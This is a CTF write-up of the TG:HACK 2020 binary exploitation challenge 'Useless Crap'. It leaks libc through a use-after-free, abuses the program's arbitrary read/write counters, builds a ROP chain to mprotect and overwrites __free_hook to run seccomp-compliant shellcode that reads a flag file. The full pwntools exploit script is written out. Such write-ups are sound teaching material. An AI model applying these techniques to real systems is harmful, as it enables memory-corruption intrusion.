Useless Crap? No, not nearly! Advance your binary exploitation skills by solving a sophisticated CTF challenge

PWN challenges are my favorite tasks at CTF contests. Such tasks effectively train you in real-life code analysis, while their write-ups usually describe all fine details, even those already addressed by other authors. Today, I will explain how to solve a task named “Useless Crap” by its author (it’s available on TG:HACK 2020). The author estimates its difficulty as hard. The task is very challenging indeed, and it took me almost twelve hours to complete it at the contest.

Preparations

I don’t give any special preferences to IDA or Ghidra and use both disassemblers depending on the situation. However, in PWN challenges, IDA normally generates better pseudocode.

Vanilla GDB is normally used in combinations with various plugins: PEDA, GEF, or pwndbg. Out of them, PEDA is the oldest (and classical!) variant, and I still use it.

While programmers all over the world are migrating en masse to Python 3, developers of exploits remain loyal to oldie-goodie Python 2. The point is that the third version of Python handles raw bytes in quite an inconvenient way, and you have to keep this in mind all the time and spend extra effort on bug fixing.

Other useful tools are:

  • pwntools – a handy Python API for interaction with executable files;
  • checksec – a bash script used to check security mechanisms of binary files; and
  • patchelf – a utility for patching libc and executable files.

Initial examination

So, the author gives me a binary and two more files: a server libc and a linker. The path to the file is precisely specified, and I immediately suspect that a custom-made shellcode will be required at the final stage.

First of all, I execute the binary and try to estimate the difficulty by reviewing security mitigations in checksec.

To make sure that the executable file uses the right libc, I patch it to adjust the path to the linker and specify the libc in the LD_PRELOADenvironment variable.

patchelf --set-interpreter ld-2.31.so ./crap
LD_PRELOAD=./libc-2.31.so ./crap

The simple menu implies that the solution may also be quick and simple, but this hope fades after launching checksec.

All the protection mechanisms are enabled. Below are their brief descriptions:

NX makes the stack non-executable. Twenty years ago, the majority of stack overflow vulnerabilities were exploited through the injection of shellcode into the stack and subsequent jump on it. NX makes this trick impossible, even though such exploitation techniques are still used in the IoT world.

Stack canary is a secret value placed on the stack before the RBP register and return pointer. As a result, it becomes impossible to overwrite the register and return pointer, thus, abusing the buffer overflow vulnerability.

Full RELRO makes the GOT segment read-only and places it before the BSS segment. Exploitation techniques involving GOT overwriting are pretty simple, but their detailed analysis goes beyond the scope of this article. More information on the Global Offset Table can be found here.

ASLR and PIE

Address Space Layout Randomization (ASLR) is a protection mechanism making exploitation much more labor-consuming. It randomizes base addresses of all memory regions except for the sections belonging to the binary itself.

In essence, ASLR works as follows. A fixed reference point (base address) is set within a range of addresses that exceeds the randomized memory area by several orders of magnitude. This address must meet two requirements.

  • its last two nibbles (i.e. half-bytes) must be equal to 000; and
  • the entire randomized region must not conflict with other regions or go beyond the allowed) range of addresses.

Unfortunately for the attacker, this mechanism is very efficient. Let’s say, I need to find the address of the system function in libc. How much time do I need to find it? The first byte of any library’s address must be (OK, in most cases must be!) 0x7f. The last three nibbles are known because they remain the same every time the program is launched regardless of the base address selection. So, I can perform a simple computation:

2^8 * 2^8 * 2^8 * 2^4 = 2^28 = 268 435 456

Of course, this is a rough estimate that does not take into account some addresses in the upper part of the range that cannot be used (otherwise, the rest of the memory region wouldn’t fit into the range). However, it is sufficient for my purposes. Let’s say, it takes me three seconds to launch an exploit. So, it will take me some 25 years to brute-force the required address, which is way too long taking that CTF contest only lasts for 48 hours.

In simple terms, PIE is an ASLR for memory segments of the executable file. Unlike the basic ASLR operating at the OS level, PIE is an optional protection mechanism that may or may not be present in a binary file.

Reverse engineering

An old legend says that if you awaken a reverse engineer in the middle of the night and give her a laptop, she will immediately run IDA and press F5. As for me, I always do so when I deal with an unknown executable file.

I am lucky: the decompiled pseudocode looks nicely and is easily readable.

Let’s examine the above functions one-by-one.

1. init

There is nothing special there: the input/output buffering is disabled, and operation time is specified for the program (after 0x3c seconds, it jumps to the handler function consisting of a single line: exit(0);).

2. sandbox

This function is more interesting: I see that seccomp is configured pretty rigidly in the program. Let’s see what system calls are allowed. A numbered Linux syscall table is available here.

As you can see, exit, mprotect, open, and close are permitted. The final exploitation stage is now clear: I must make one of the memory regions readable, writable, and executable, write there a shellcode enabling to read the file containing the flag, and jump to it.

System calls read and write are also available, although not to the full extent. IDA does not show seccomp_rule_add arguments after the fourth one, while the main configuration rules for the above syscalls must be there. But I can right-click on the function name and select the Set call type option, which allows to add a few more __int64 and see more arguments.

Based on my personal experience with seccomp, I can say that IDA has incorrectly identified the seventh argument, which is equal to SCMP_CMP_EQ (i.e. 4); however, it becomes clear that the program can read only from the null file descriptor (stdin) and write only to the first descriptor (stdout). It remains unclear though how to write the shellcode: it must be read from an open file’s descriptor that definitely won’t be null. I will get back to this later.

3. menu

This menu is displayed in main at each cycle iteration.

4. get_num

The number of the selected function is obtained securely; so, there is nothing of interest to me here.

5. do_read

The author of the task grants me the arbitrary read power. Such sorts of tasks aren’t unique or extremely rare, but they are usually very intriguing. I can read anything from anywhere not more than twice – or, at least, the program will think so. The read_count variable is not global; therefore, it is stored not in the stack, but in BSS. I must keep this information in mind as it may facilitate the exploitation.

6. do_write

do_write operates in the same way. I can write anything anywhere provided that write_count is less than or equal to one. It’s not a big deal to cheat this mechanism: for instance, after each writing operation performed with do_write, I can set the write_count value to -1, thus, gaining the unlimited arbitrary write power (as you understand, the unlimited arbitrary read power can be obtained using the same trick).

I haven’t finished reviewing the code yet but already gained significant control over the program execution flow.

7. leave_feedback

When I select the third menu option, the program asks to leave feedback instead of closing immediately. The following mechanism is used:

  • program checks whether the global feedback pointer is equal to zero;
  • if not, the program allocates a chunk 0x501 in size and allows me to directly input information into it;
  • then the program asks me whether I want my feedback to be saved; and
  • if I enter n, the chunk is cleared, but the feedback pointer isn’t reset to zero.

So far, this error does not seem critical, but later on, it may become very useful for me.

To call this function, I must enter 4 (as you remember, such an option is not offered in the menu). The view_feedback function displays the information feedback points to without checking the status of the chunk (that could be already freed). This vulnerability type is called Use-After-Free (UAF). In theory, the user’s input should be stored at the pointer’s address – but a bit later, I will show that this is not always true for freed memory chunks.

UAF and why it’s great

Detailed information about the ptmalloc implementation can be found in the Sploit Fun blog; so, I will describe the interaction with heap memory only briefly. I am going to write a special program to show what happens when a programmer creates a chunk 1281 bytes in size and then frees it.

#include <stdio.h>
#include <stdlib.h>
int main() {
void **a, *b;
a = calloc(1, 1281);
b = malloc(200);
free(a);
printf("%p\n", *a);
}

The b chunk is required to prevent consolidation with the top chunk and complete destruction of the structure of the a chunk after freeing it.

  • calloc(1, 1281) returns the pointer exactly to the position where data can be written; this allows the programmer not to keep in mind internal memory heap implementation mechanisms;
  • the size of the a chunk exceeds 1032; therefore, after the free(a) command, it is placed into the so-called unsorted bin. Important: the forward pointer and backward pointer (i.e. pointers created to expedite the work of ptmalloc) of the chunk placed into the unsorted bin both point to libc.
  • the a pointer is equal to the address of the forward pointer. Therefore, a pointer to libc is currently stored where the user’s input was earlier stored, and printf will display it to me.

Overall, the first exploitation phase is clear.

  1. I select leave_feedback and tell the program not to save my feedback.
  2. Then I select view_feedback and get the libc address.

I use GDB to calculate the offset to the libc base address.

  1. Using set exec-wrapper env 'LD_PRELOAD=./libc-2.31.so', I load the required version of libc.
  2. Using the vmmap command, I examine all memory regions.

  3. Using the ni and si commands, I reach to the instruction that frees the chunk I am interested in; using x/6b, I check what pointer is stored there.

I see 0x7f in the end and conclude that this is one of the libc addresses. It’s not a big deal to calculate the difference between 0x7ffff7fc2be0 and 0x7ffff7c0d000: it is 0x3b5be0. Now I know the offset from the libc base address to the obtained address.

I start writing the exploit:

from pwn import *
p=process('./crap')
p.recvuntil('>')
p.sendline('3')
p.recvuntil(': ')
p.sendline('AAAA')
p.recvuntil('y/n')
p.sendline('n')
p.recvuntil('>')
p.sendline('4')
# Parsing the output section I am interested in
x = p.recvline().strip().split(': ')[-1][::-1].encode('hex')
libc_base = int(x, 16) - 0x3b5be0
print 'libc base is', hex(libc_base)

Strengthening the control

To simplify the development of my exploit, I am going to describe the read and write functions using my own Python wrappers.

def read(addr):
p.sendline('1')
p.recvuntil('addr: ')
p.sendline(hex(addr)[2:])
x=p.recvline().strip().split(': ')[-1]
p.recvuntil('>')
return x
def write(where, what):
p.sendline('2')
p.recvuntil(': ')
p.sendline('{} {}'.format(hex(where)[2:], hex(what)[2:]))
p.recvuntil('>')

I made a few steps towards the exploitation, but success is still far, far away. I know the libc address, but I also need the PIE and stack addresses. The GNU C Library (glibc) includes a global variable called environ that points to environment variables stored in the stack; so, I need to find out its value. This can be done as follows:

  • Use environ to get the stack address; and
  • Use scientific trial and error to find a position on the stack that stores one of the PIE addresses at each launch of the program.

To calculate the offset from the address stored in environ to the libc base address, I use again the x and vmmap commands.

The following simple code will perform the required operations:

environ=libc_base+0x3b8618
print 'environ is', hex(environ)
stack=int(read(environ), 16)
print 'stack is', hex(stack)
# the value is -48; it can be obtained either by examining the stack in GDB
# or by brute-forcing
pie=read(stack-48)
# the offset is -2970; all offsets were obtained using x and vmmap
pie=int(pie, 16)-2970
read_count=pie+2105392
write_count=pie+0x202033
feedback=pie+0x202038
print 'pie is', hex(pie)
write(read_count, 0) # read_count=0
write(write_count, 0xfffffffffffffff0) # write_count = -16

What is ROP?

Return-oriented programming (ROP) is an elegant technique that can be used to bypass certain protection mechanisms. I strongly recommend mastering it – even if the development of exploits is just a hobby for you. Detailed descriptions of basic ROP tricks are available on ROP Emporium.

In brief, ROP is yet another binary exploitation technique; its key feature is that you assemble your program from fragments of the exploited program. The term “gadget” refers to a special fragment of the program: after its execution, the hacker does not lose control over the program execution flow but can execute other gadgets.

I have to make one of the memory regions Readable, Writable и eXecutable (RWX). To escalate my privileges, I call the mprotect function as shown below.

mprotect(addr, some_size, 7)

The third argument indicates that I want to make the region RWX.

ROP will help me to place the right values to the right registers. In 64-bit Linux, arguments correspond to registers in the following order:

  • RDI – I
  • RSI – II
  • RDX – III
  • RCX – IV
  • R8 – V
  • R9 – VI

Subsequent arguments (if any) are stored in the stack.

ROP is normally used to exploit the buffer overflow vulnerability; but there is no such vulnerability here, and I can’t create it artificially. Therefore, I invent the following algorithm.

  • Using do_write, I write a ROP chain in the stack so that the offset from the beginning of this chain to the return address of the do_write function is exactly 16 bytes.
  • After writing the entire chain on the stack, I overwrite return address do_write by a gadget in the format: pop some_reg; pop some_reg; ret;. This gadget will ‘consume’ the 16 bytes left between the return pointer and the ROP chain and execute the chain.

For the testing purposes, I select an address spaced away from the PIE root by 0x201000 and try to escalate my rights to it. The general scheme looks as follows:

make rdi = (pie+0x201000)
# figure 1000 was pulled out of a hat. You can use any other number
# because mprotect will change the entire region's rights
make rsi = 1000
make rdx = 7
call mprotect

I prefer to search for gadgets with ROPgadget.

I feed the obtained libc to the program and search for gadgets using the command below:

ROPgadget --binary libc-2.31.so > n

Using any text processing program, I can now extract suitable gadgets from the long list shown above. In this particular case, I select the following gadgets:

0x0000000000021882 : pop rdi ; ret
0x0000000000022192 : pop rsi ; ret
0x000000000012c561 : pop rax ; pop rdx ; pop rbx ; ret
0x000000000002187f : pop r14 ; pop r15 ; ret

The last gadget will trigger the chain execution. The offset to mprotect can be found in GDB. Below is the exploit code:

pop_rdi = 0x21882
pop_rsi = 0x22192
pop_rax_rdx_rbx = 0x12c561
pop_r14_r15 = 0x2187f
place=pie+0x201000
mprotect = libc_base + 986064
# The offset can be calculated by setting a breakpoint
# at the ret instruction in the do_write function
add = stack - 264
write(add, libc_base+pop_rdi)
write(write_count, 0xfffffffffffffff0)
write(add+8, place)
write(write_count, 0xfffffffffffffff0)
write(add+16, libc_base+pop_rsi)
write(write_count, 0xfffffffffffffff0)
write(add+24, 1000)
write(write_count, 0xfffffffffffffff0)
write(add+32, libc_base+pop_rax_rdx_rbx)
write(write_count, 0xfffffffffffffff0)
write(add+40, 0)
write(write_count, 0xfffffffffffffff0)
write(add+48, 7)
write(write_count, 0xfffffffffffffff0)
write(add+56, 0)
write(write_count, 0xfffffffffffffff0)
write(add+64, mprotect)
write(write_count, 0xfffffffffffffff0)
# After executing the chain, I jump to main
write(add+72, pie+0x0000000000001192)
write(write_count, 0xfffffffffffffff0)
# This is where I finished writing ROP;
# now I have to force the program to execute it
# Position in the stack where the return address of do_write is located
ret = stack - 288
write(ret, libc_base+pop_r14_r15)
write(write_count, 0xfffffffffffffff0)

The target memory region is now readable, writable, and executable.

Writing shellcode

Time to figure out how to write a shellcode required to complete the exploitation. During the CTF challenge, I spent some ten hours on this… Fortunately, at some point I stumbled upon an interesting question on Stack Overflow that gave me the right idea.

The idea is as follows: the minimum possible file descriptor is assigned to a newly-opened file. If the null descriptor were available, then open("flag.txt", O_RDONLY) would return zero (i.e. under normal conditions, I could address the file as stdin). To achieve this, all I have to do is execute close(0) because seccomp permits the close system call.

The idea is simple and elegant, which makes this task truly exciting.

shell='''
mov rdi, 0
mov rax, 3
syscall ; closing stdin
mov rsi, 0
push 0
mov rcx, 8392585648256674918 ; "flag.txt" in little-endian
push rcx
mov rdi, rsp
mov rax, 2
syscall
mov rax, 0
mov rdi, 0
mov rsi, rsp
mov rdx, 60
syscall ; writing flag to the top of the stack
mov rdi, 1
mov rsi, rsp
mov rdx, 60
mov rax, 1
syscall ; printing flag
'''
print shell
# pwntools provides a handy API for shellcode creation
shellcode=asm(shell).encode('hex')
# There is nothing special in this cycle. It just creates 8-byte records
for i in range(13):
print(i)
write(place+(i*8), int(shellcode[i*16:(i+1)*16].decode('hex')[::-1].encode('hex'), 16))
write(write_count, 0xfffffffffffffff0)

Using free_hook

GNU C makes it possible to alter the behavior of the functions malloc, free, and realloc using respective hooks. If the __malloc_hook, __free_hook, or __realloc_hook values are nonzero, then the program (that attempts to perform the respective functions) will jump to the addresses written in them. More information on this and other binary exploitation features can be found in the extremely useful CTF-pwn-tips repository.

To complete the exploitation, I am going to jump to the shellcode using __free_hook. As you remember, the program executes the free operation if I opt not to save my feedback in the leave_feedback function. The final part of the exploit is as follows:

free_hook=3898952+libc_base
print 'free_hook is', hex(free_hook)
print 'place is', hex(place)
print 'feedback is', hex(feedback)
write(free_hook, place)
write(write_count, 0xfffffffffffffff0)
write(feedback, 0)
# Triggering free
p.sendline('3')
p.recvuntil(': ')
p.sendline('AAAA')
p.recvuntil('y/n')
p.sendline('n')
p.interactive()

Conclusions

I am grateful to PewZ, the author of this task, for an exciting idea and for the provision of a docker container from the game server. To solve the task by your own, execute the command:

nc ctf.sprush.rocks 6001

It should remain active at least until mid-June 2020.


Leave a Reply

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>